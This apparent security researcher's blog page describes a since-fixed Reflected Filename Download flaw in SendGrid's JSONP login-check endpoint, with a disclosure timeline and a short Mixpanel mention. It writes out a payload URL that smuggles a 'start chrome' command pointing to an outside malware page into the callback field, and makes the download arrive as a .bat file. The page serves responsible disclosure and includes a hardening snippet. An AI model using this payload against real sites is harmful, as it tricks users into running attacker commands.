Got some cool gifts from Edmodo. Always glad to help others to improve their security 🙂
For those who don’t know who SendGrid is…
SendGrid provides unmatched deliverability, scalability, and reliability. We deliver email on behalf of happy customers such as: Airbnb, Foursquare, Spotify and Uber.
They send over 19 billion emails per month.
When visiting their site I noticed an XHR request in my Google Inspector that caught my attention:
https://sendgrid.com/user/checkLogin?callback=mycallback&callback=jQuery171016384647646918893_1439389801565&_=1439389801826
Which returned the following JSON information:
/**/jQuery171016384647646918893_1439389801565({"status":"success","logged_in":false});
I noticed that the callback name was taken from the URL and reflected, so I decided to inject my RFD vector:
https://sendgrid.com/user/checkLogin?callback=mycallback&callback=||start chrome websegura.net/malware.htm||
Reflecting:
/**/||start chrome websegura.net/malware.htm||({"status":"success","logged_in":false});
Now that I could reflect my payload, I removed the variables that don't do anything in my proof-of-concept and tried to manipulate the filename without causing an HTTP error:
https://sendgrid.com/user/checkLogin/freecoupons.bat?&callback=||start chrome websegura.net/malware.htm||
For Internet Explorer 8 and 9 you didn’t need anything else.
If you opened this last URL, the browser would automatically try to download the freecoupons.bat file from sendgrid.com servers.
On other modern browsers you needed the HTML5 download attribute.
The download would start just by clicking the image.
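As an added example (not SendGrid's code), this is how a JSONP endpoint like checkLogin can be hardened against the behaviour described above: the callback is only reflected when it looks like a JavaScript identifier, and a fixed Content-Disposition filename stops the URL path from naming the download. The function name, regex and filename are my own assumptions.

```python
import json
import re

# Hypothetical hardening of a checkLogin-style JSONP endpoint (constructed
# example, not the vendor's code). A callback must look like a JavaScript
# identifier, so shell metacharacters such as '|' or ';' are never echoed.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]{0,63}$")


def jsonp_response(callback, payload):
    """Return (status, headers, body) for a JSONP request.

    `callback` is the raw query parameter; `payload` is the data to wrap.
    Invalid callbacks get a plain JSON error instead of being reflected.
    """
    if callback is None or not CALLBACK_RE.match(callback):
        error = {"status": "error", "message": "invalid callback"}
        return 400, {"Content-Type": "application/json"}, json.dumps(error)

    headers = {
        # Script content type, and no MIME sniffing by the browser.
        "Content-Type": "application/javascript; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
        # Fixed filename: even if the path is extended to
        # /checkLogin/anything.bat the browser saves it under this name.
        "Content-Disposition": 'inline; filename="checkLogin.json"',
    }
    # Keep the leading /**/ that the original response emits.
    body = "/**/" + callback + "(" + json.dumps(payload) + ");"
    return 200, headers, body
```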
A malicious user could:
SendGrid were always on top of the issue [cool guys] and they were nice enough to send me an awesome t-shirt 🙂
Timeline:
12-08-2015 Reported this security issue to SendGrid
20-08-2015 SendGrid replied that they were fixing the issue
29-09-2015 Asked for an update
27-10-2015 SendGrid reported that the issue is fixed
I would like to thank Cobalt.io team for the gift pack they sent me.
Working with them is awesome and I hope to keep helping and growing with you guys.
PS: Nice to be an Ace of Diamonds 🙂
Cheers!
When I help companies to fix security issues I do not ask anything in return.
I came across a security issue on Mixpanel while auditing a private client on Cobalt.io, and I sent Mixpanel a little security advisory describing a Reflected Filename Download vulnerability with a couple of screenshots.
Mixpanel security team fixed the vulnerability very fast showing that they care about security.